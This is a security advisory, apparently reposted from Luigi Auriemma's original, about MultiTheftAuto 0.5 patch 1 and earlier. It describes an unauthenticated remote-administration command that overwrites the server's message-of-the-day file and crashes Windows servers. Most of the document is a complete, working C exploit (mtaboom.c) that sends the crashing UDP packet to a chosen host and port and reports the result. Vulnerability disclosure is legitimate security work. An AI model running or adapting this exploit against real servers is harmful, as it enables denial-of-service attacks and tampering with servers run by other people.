Summary
MultiTheftAuto (MTA) is a closed-source mod and server for the games Grand Theft Auto III and Grand Theft Auto: Vice City which adds multiplayer capabilities to them.

MultiTheftAuto does not check privileges for a command that allow to overwrite information and cause a DoS by attackers.

Credit:
The information has been provided by Luigi Auriemma .
The original article can be found at: http://aluigi.altervista.org/adv/mtaboom-adv.txt

Details
Vulnerable Systems:
* MultiTheftAuto version 0.5 patch 1 and prior

Privileges Escalation:
The MTA server has the remote administration option enabled by default. The problem is the existence of an undocumented command (number 40) which allows the modification or the deletion of the content of the motd.txt file used for the message of the day.
This is the only command which doesn't check if the client is an administrator so anyone without permissions has access to it.

Denail of Service:
The command 40 is also the cause of another problem located in the same function which seems incomplete or experimental as showed by the following "retrieved" code:
// open file for writing "w"
length = *(u_int *)(src - (src % 4096));
for(i = j = 0; i < length; i++) {
if(src[i] == '\n') dst[j++] = '\r';
dst[j++] = src[i];
if(j < 1024) continue;
if(!WriteFile(...)) break;
j = 0;
}
// close file

length is -1 so the function starts an almost endless loop which stops when the source buffer points to an unallocated zone of the memory. The result is the immediate crash of the MTA server.

Seems that only the Windows server is affected by the crash because on Linux the function is substituited with the following "still incorrect" instruction which doesn't produce exceptions:
fd = fopen("motd.txt", "w");
fwrite(data + 4, 1, data, fd); // yes data is the buffer
fclose(fd);

Exploit:
winerr.h can be found at: http://www.securiteam.com/unixfocus/5UP0I1FC0Y.html

mtaboom.c:
/*

by Luigi Auriemma

*/

#include <stdio.h>
#include <stdlib.h>

#ifdef WIN32
#include <winsock.h>
#include "winerr.h"

#define close closesocket
#define ONESEC 1000
#else
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <arpa/inet.h>
#include <netinet/in.h>
#include <netdb.h>

#define ONESEC 1
#endif

#define VER "0.1"
#define BUFFSZ 4096
#define PORT 4003
#define TIMEOUT 3
#define PING "\x0d\x30\x00" // not a ping, just a way to get a reply
#define BOOM "\x28" // that's enough

int timeout(int sock);
u_int resolv(char *host);
void std_err(void);

int main(int argc, char *argv[]) {
struct sockaddr_in peer;
int sd,
len;
u_short port = PORT;
u_char buff[BUFFSZ];

#ifdef WIN32
WSADATA wsadata;
WSAStartup(MAKEWORD(1,0), &wsadata);
#endif

setbuf(stdout, NULL);

fputs("\n"
"MultiTheftAuto <= 0.5 patch 1 server crash/motd reset "VER"\n"
"by Luigi Auriemma\n"
"e-mail: aluigi@autistici.org\n"
"web: http://aluigi.altervista.org\n"
"\n", stdout);

if(argc < 2) {
printf("\n"
"Usage: %s <host> [port(%hu)]\n"
"\n", argv[0], port);
exit(1);
}

if(argc > 2) port = atoi(argv[2]);
peer.sin_addr.s_addr = resolv(argv[1]);
peer.sin_port = htons(port);
peer.sin_family = AF_INET;

printf("- target %s : %hu\n",
inet_ntoa(peer.sin_addr), port);

sd = socket(AF_INET, SOCK_DGRAM, IPPROTO_UDP);
if(sd < 0) std_err();

fputs("- check server:\n", stdout);
if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\n"
"Error: the server doesn't seem to support remote administration\n"
" try using the port 24003\n"
"\n", stdout);
exit(1);
}
len = recvfrom(sd, buff, BUFFSZ, 0, NULL, NULL);
if(len < 0) std_err();

sleep(ONESEC);

fputs("- send BOOM packet:\n", stdout);
if(sendto(sd, BOOM, sizeof(BOOM) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();

sleep(ONESEC);

fputs("- check server:\n", stdout);
if(sendto(sd, PING, sizeof(PING) - 1, 0, (struct sockaddr *)&peer, sizeof(peer))
< 0) std_err();
if(timeout(sd) < 0) {
fputs("\nServer IS vulnerable!!!\n\n", stdout);
} else {
fputs("\nServer doesn't seem to crash but probably you have deleted its motd.txt file\n\n", stdout);
}

close(sd);
return(0);
}

int timeout(int sock) {
struct timeval tout;
fd_set fd_read;
int err;

tout.tv_sec = TIMEOUT;
tout.tv_usec = 0;
FD_ZERO(&fd_read);
FD_SET(sock, &fd_read);
err = select(sock + 1, &fd_read, NULL, NULL, &tout);
if(err < 0) std_err();
if(!err) return(-1);
return(0);
}

u_int resolv(char *host) {
struct hostent *hp;
u_int host_ip;

host_ip = inet_addr(host);
if(host_ip == INADDR_NONE) {
hp = gethostbyname(host);
if(!hp) {
printf("\nError: Unable to resolv hostname (%s)\n\n", host);
exit(1);
} else host_ip = *(u_int *)hp->h_addr;
}
return(host_ip);
}

#ifndef WIN32
void std_err(void) {
perror("\nError");
exit(1);
}
#endif